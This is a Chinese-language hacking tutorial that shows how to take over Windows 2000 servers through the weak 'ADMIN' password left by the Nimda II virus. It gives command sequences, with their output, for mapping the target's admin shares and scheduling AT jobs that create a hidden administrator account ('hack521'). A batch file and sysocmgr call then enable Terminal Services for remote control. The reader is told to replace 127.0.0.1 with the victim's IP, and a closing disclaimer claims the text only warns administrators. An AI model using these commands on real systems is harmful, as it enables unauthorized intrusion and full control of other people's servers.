在WINDOWS 2000的网络命令家族中，NET命令集和AT远程执行工具是最好的工具！

目前，尼姆达II病毒仍然在互联网络上广为流传！

我们就利用尼姆达II给我们带来的漏洞！

结合NET命令集和AT远程执行工具把自己提升为系统管理员吧！

首先，需要你的电脑上安装有Windows 2000 Server OR Professional

其次，我们进入CMD（Windows 2000的命令提示符）

（不知道如何进入命令提示符？）

单击开始按钮，选择运行……，输入CMD，然后回车

会看到一个窗口（DOS状态的）

C:\>NET USE \\127.0.0.1\IPC$ "ADMIN" /USER:"ADMIN"
命令成功完成
C:\>NET USE X: \\127.0.0.1\C$
命令成功完成
C:\>NET TIME \\127.0.0.1 /SET
是否与\\127.0.0.1的时间一致？[Y/N]Y
命令成功完成
C:\>AT \\127.0.0.1 18:00 C:\WINNT\SYSTEM32\NET.EXE USER hack521 123 /ADD
计划成功添加 ID=1
C:\>AT \\127.0.0.1 18:02 C:\WINNT\SYSTEM32\NET.EXE LOCALGROUP Administrators hack521 /ADD
计划成功添加 ID=2

OK 我来解释一下！

127.0.0.1是你本地的IP地址(没有上网的时候)，具体实战的时候替换成对方的网络IP！

"ADMIN" /USER:"ADMIN" 这个是尼姆达II病毒制造的弱口令！权限为SYSTEM！

NET TIME \\127.0.0.1 /SET 将本地时间与服务器时间同步！

两行AT命令是分别在18:00与18:02执行服务器的两个NET命令

前一个是创建一个用户，后面的是将用户提升为系统管理员

这样，我们以后就可以用hack521这个用户访问这台服务器了！

黑客的目的不仅仅是要提升自己为系统管理员而已，还要完全控制整台服务器！

我们仍然在命令提示符下面（CMD状态）

C:\>COPY CON hack.bat
@ECHO TSEnable = on >> C:\sql^Z
1 个文件拷贝完成
C:\>COPY hack.bat X:\
1 个文件拷贝完成
C:\>AT \\127.0.0.1 18:30 C:\hack.bat
计划成功添加 ID=1
C:\>AT \\127.0.0.1 18:32 C:\WINNT\SYSTEM32\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
计划成功添加 ID=1
c:\>

OK 我来解释一下！

COPY CON hack.bat是创建一个批处理，输入命令的时候一定要小心，错了就得重新来一遍！

（如果notepad使用熟练的话，可以使用notepad编辑）

X:是映射的本地驱动器，盘符是自己定义的（不与本地驱动器同名即可）

两行AT命令是分别在18:30与18:32执行服务器的两个外部程序

前一个是执行我们创建的那个批处理程序，后面的是调用系统服务管理，启动远程管理功能

执行后，你不要着急连接远程管理功能，因为服务器正在重新启动中，得等一段时间！

大约5-6分钟以后，就可以使用了！

使用WinCtrl软件（关于WinCtrl的使用方法，看软件的帮助）连接上服务器！

当看到登录屏幕的时候，使用刚才创建的hack521用户登录吧！

严正声明：本文只用于警示那些不负责任，没有安全意识的系统管理员们！